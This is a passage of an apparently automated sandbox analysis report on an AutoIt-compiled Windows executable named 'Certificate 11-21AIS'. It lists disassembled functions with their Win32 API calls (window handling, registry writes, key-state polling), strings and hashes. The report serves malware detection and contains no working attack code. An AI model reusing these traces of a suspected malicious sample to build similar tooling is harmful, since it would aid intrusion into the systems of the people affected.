                                                                              • GetSystemMetrics.USER32(00000004), ref: 008DA999
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008DA9B6
                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 008DA9C6
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008DA9F9
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008DAA0D
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 008DAA2B
                                                                              • GetStockObject.GDI32(00000011), ref: 008DAA47
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008DAA52
                                                                                • Part of subcall function 008DB63C: GetCursorPos.USER32(000000FF), ref: 008DB64F
                                                                                • Part of subcall function 008DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008DB66C
                                                                                • Part of subcall function 008DB63C: GetAsyncKeyState.USER32(00000001), ref: 008DB691
                                                                                • Part of subcall function 008DB63C: GetAsyncKeyState.USER32(00000002), ref: 008DB69F
                                                                              • SetTimer.USER32(00000000,00000000,00000028,008DAB87), ref: 008DAA79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 374fad3e4dd4984384bf7dcf18630747dd156a8308f778b4a9e783c6fe24a57c
                                                                              • Instruction ID: d6f718fe8ef8372d6612fe7f21416efa5d58b4543222f95e41eeec7604b23b1f
                                                                              • Opcode Fuzzy Hash: 374fad3e4dd4984384bf7dcf18630747dd156a8308f778b4a9e783c6fe24a57c
                                                                              • Instruction Fuzzy Hash: 11B18A75A0520AAFDB14DFA8DC45BAE7BB8FB08314F11422AFA15E7390DB349841DF51
                                                                              Function 008C2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Foreground
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 62970417-1919597938
                                                                              • Opcode ID: 7b59216b35ae7580afed3af0ba858218f0fd9832076cd839ccb93ddb8d82f44d
                                                                              • Instruction ID: 47c024d466ed3ab112462218518a337494ced59f3b45436ed32b648ed8204ebf
                                                                              • Opcode Fuzzy Hash: 7b59216b35ae7580afed3af0ba858218f0fd9832076cd839ccb93ddb8d82f44d
                                                                              • Instruction Fuzzy Hash: ABD1B730118346DBCB18EF64C881EAABBB4FF55344F104A2DF459975A1DB30E99ACF92
                                                                              Function 00923639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00923735
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0095DC00,00000000,?,00000000,?,?), ref: 009237A3
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009237EB
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00923874
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00923B94
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00923BA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 11b591c0106295e26e48d0bf8b3f1b35310f3dddc54cc2c56239a1b2db5aa964
                                                                              • Instruction ID: b6e0b19d8c7d5d2bb83272a70a34a050578e0ad67fffd188557d6a29560ace78
                                                                              • Opcode Fuzzy Hash: 11b591c0106295e26e48d0bf8b3f1b35310f3dddc54cc2c56239a1b2db5aa964
                                                                              • Instruction Fuzzy Hash: 540249752046119FCB14EF28D845E2AB7E9FF89710F04895DF98A9B3A1CB34ED41CB82
                                                                              Function 00926BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00926C56
                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00926D16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                              • API String ID: 3974292440-719923060
                                                                              • Opcode ID: b6e9de47dc64a1c7faead718e35941e9eef9741765b4e5128ecfc70820ce5620
                                                                              • Instruction ID: 35e0841b8156a83b8a34a6ab594d9cb748265f4d98db6647922f6edf83a92163
                                                                              • Opcode Fuzzy Hash: b6e9de47dc64a1c7faead718e35941e9eef9741765b4e5128ecfc70820ce5620
                                                                              • Instruction Fuzzy Hash: 61A18A312143559BCB14FF28D951E6AB3A5FF84310F10896DB99A9B7D6DB30EC06CB82
                                                                              Function 008FCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FCF91
                                                                              • __swprintf.LIBCMT ref: 008FD032
                                                                              • _wcscmp.LIBCMT ref: 008FD045
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008FD09A
                                                                              • _wcscmp.LIBCMT ref: 008FD0D6
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 008FD10D
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FD15F
                                                                              • GetWindowRect.USER32(?,?), ref: 008FD195
                                                                              • GetParent.USER32(?), ref: 008FD1B3
                                                                              • ScreenToClient.USER32(00000000), ref: 008FD1BA
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FD234
                                                                              • _wcscmp.LIBCMT ref: 008FD248
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 008FD26E
                                                                              • _wcscmp.LIBCMT ref: 008FD282
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                              • String ID: %s%u
                                                                              • API String ID: 3119225716-679674701
                                                                              • Opcode ID: e982a73a11683f03a0ad3feded5b9100edb02b1f0da1e3ce9ba8085072eac21b
                                                                              • Instruction ID: 0cdd26990e3c5731b44c281cb22e5dbc9a32283e35f57a415959c4c01a277b62
                                                                              • Opcode Fuzzy Hash: e982a73a11683f03a0ad3feded5b9100edb02b1f0da1e3ce9ba8085072eac21b
                                                                              • Instruction Fuzzy Hash: 59A18D7160470AABD715DF74C884FBAB7A9FF44354F008619EB99D2190DB30EA46CB91
                                                                              Function 008FD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 008FD8EB
                                                                              • _wcscmp.LIBCMT ref: 008FD8FC
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 008FD924
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 008FD941
                                                                              • _wcscmp.LIBCMT ref: 008FD95F
                                                                              • _wcsstr.LIBCMT ref: 008FD970
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008FD9A8
                                                                              • _wcscmp.LIBCMT ref: 008FD9B8
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 008FD9DF
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008FDA28
                                                                              • _wcscmp.LIBCMT ref: 008FDA38
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 008FDA60
                                                                              • GetWindowRect.USER32(00000004,?), ref: 008FDAC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: bbb0ce86d2da3b377afad8aae1afa63096f459f3f134887e5a4f1c695fb1ca1a
                                                                              • Instruction ID: 0dcee09123aa969453233d28164d2bdea67fdde0bbf8c47dbab78aaa3a4c94bc
                                                                              • Opcode Fuzzy Hash: bbb0ce86d2da3b377afad8aae1afa63096f459f3f134887e5a4f1c695fb1ca1a
                                                                              • Instruction Fuzzy Hash: 6081AD311083499BDB01DF64C885FBA7BE9FF85314F04846AEF89DA096DB70D945CBA1
                                                                              Function 008FD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: cd471c4f7d7159b4db65271d2272826aadf825518ecb381fdb0053dae26d5533
                                                                              • Instruction ID: a64c0f1825c173f0c1b3d4155a7896503dd5e0628dbd8147c2ed748cce31fef8
                                                                              • Opcode Fuzzy Hash: cd471c4f7d7159b4db65271d2272826aadf825518ecb381fdb0053dae26d5533
                                                                              • Instruction Fuzzy Hash: 34319832A54308AADA14FB68CE43FADB3B6FB21758F200439F645F50D1FB61AA148612
                                                                              Function 008FEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadIconW.USER32(00000063), ref: 008FEAB0
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008FEAC2
                                                                              • SetWindowTextW.USER32(?,?), ref: 008FEAD9
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 008FEAEE
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 008FEAF4
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 008FEB04
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 008FEB0A
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008FEB2B
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008FEB45
                                                                              • GetWindowRect.USER32(?,?), ref: 008FEB4E
                                                                              • SetWindowTextW.USER32(?,?), ref: 008FEBB9
                                                                              • GetDesktopWindow.USER32 ref: 008FEBBF
                                                                              • GetWindowRect.USER32(00000000), ref: 008FEBC6
                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008FEC12
                                                                              • GetClientRect.USER32(?,?), ref: 008FEC1F
                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008FEC44
                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008FEC6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: 2305ad11b553eb3fccb968d070805a42bbade7600db5090b56a9a90c6d67b167
                                                                              • Instruction ID: 2b93a9b75f2da9ea0c8b9c5a0ba26aea599783e7303d8e4ce8d026d631439b24
                                                                              • Opcode Fuzzy Hash: 2305ad11b553eb3fccb968d070805a42bbade7600db5090b56a9a90c6d67b167
                                                                              • Instruction Fuzzy Hash: DD513775900709AFDB21DFB8CD89F6EBBF5FF04709F004928E686A26A0D774A944DB10
                                                                              Function 009179B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 009179C6
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 009179D1
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 009179DC
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 009179E7
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 009179F2
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 009179FD
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00917A08
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00917A13
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00917A1E
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00917A29
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00917A34
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00917A3F
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00917A4A
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00917A55
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00917A60
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00917A6B
                                                                              • GetCursorInfo.USER32(?), ref: 00917A7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 66636e0dc15bec5920b9d42d4fb3b710cdc4eaf96e5733982aa445d79cc5c7a3
                                                                              • Instruction ID: d9c8a51880f367be2c38363df61cfda3fe2871aae193100cdefb1c25cf267e50
                                                                              • Opcode Fuzzy Hash: 66636e0dc15bec5920b9d42d4fb3b710cdc4eaf96e5733982aa445d79cc5c7a3
                                                                              • Instruction Fuzzy Hash: 9431C3B1E4831E6ADB509FB68C8999FFEB8FF04750F504526A50DE7280DA78A5408F91
                                                                              Function 008CC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008CC8B7,?,00002000,?,?,00000000,?,008C419E,?,?,?,0095DC00), ref: 008DE984
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                              • __wsplitpath.LIBCMT ref: 008CC93E
                                                                                • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
                                                                              • _wcscpy.LIBCMT ref: 008CC953
                                                                              • _wcscat.LIBCMT ref: 008CC968
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008CC978
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008CCABE
                                                                                • Part of subcall function 008CB337: _wcscpy.LIBCMT ref: 008CB36F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 2258743419-1018226102
                                                                              • Opcode ID: d167d9f8ec80c1aa77f0e09f2ec47d35f1d44b3ac6310062b7352682a3a8da49
                                                                              • Instruction ID: 68ae3f42ede3a00ff79a648cbbb10ba01dc2c5c19fd501a3991d5b89602171c6
                                                                              • Opcode Fuzzy Hash: d167d9f8ec80c1aa77f0e09f2ec47d35f1d44b3ac6310062b7352682a3a8da49
                                                                              • Instruction Fuzzy Hash: BD1258715083419FC724EF68C891AAEBBF5FF99314F40891EF589932A1DB30DA49CB52
                                                                              Function 0092CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092CEFB
                                                                              • DestroyWindow.USER32(?,?), ref: 0092CF73
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0092CFF4
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0092D016
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092D025
                                                                              • DestroyWindow.USER32(?), ref: 0092D042
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008C0000,00000000), ref: 0092D075
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092D094
                                                                              • GetDesktopWindow.USER32 ref: 0092D0A9
                                                                              • GetWindowRect.USER32(00000000), ref: 0092D0B0
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0092D0C2
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0092D0DA
                                                                                • Part of subcall function 008DB526: GetWindowLongW.USER32(?,000000EB), ref: 008DB537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 3877571568-3619404913
                                                                              • Opcode ID: 637172047629397450b88ba414ae8fe6149f58ec66e5b36f2ec437ae8192953d
                                                                              • Instruction ID: 188a931c9151506a1a06662f19be6013d579e821d415f3b4aec27976b0dd3b9d
                                                                              • Opcode Fuzzy Hash: 637172047629397450b88ba414ae8fe6149f58ec66e5b36f2ec437ae8192953d
                                                                              • Instruction Fuzzy Hash: C271CCB4194305AFDB24CF28EC84F6A37E9EB89704F04451DF985872A1E730EC42DB22
                                                                              Function 0092F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0092F37A
                                                                                • Part of subcall function 0092D7DE: ClientToScreen.USER32(?,?), ref: 0092D807
                                                                                • Part of subcall function 0092D7DE: GetWindowRect.USER32(?,?), ref: 0092D87D
                                                                                • Part of subcall function 0092D7DE: PtInRect.USER32(?,?,0092ED5A), ref: 0092D88D
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0092F3E3
                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0092F3EE
                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0092F411
                                                                              • _wcscat.LIBCMT ref: 0092F441
                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0092F458
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0092F471
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0092F488
                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0092F4AA
                                                                              • DragFinish.SHELL32(?), ref: 0092F4B1
                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0092F59C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                              • API String ID: 169749273-3440237614
                                                                              • Opcode ID: 138d77c0f6f119e97d468b922c57448c833971d62d631cfd630b0a61375ddde5
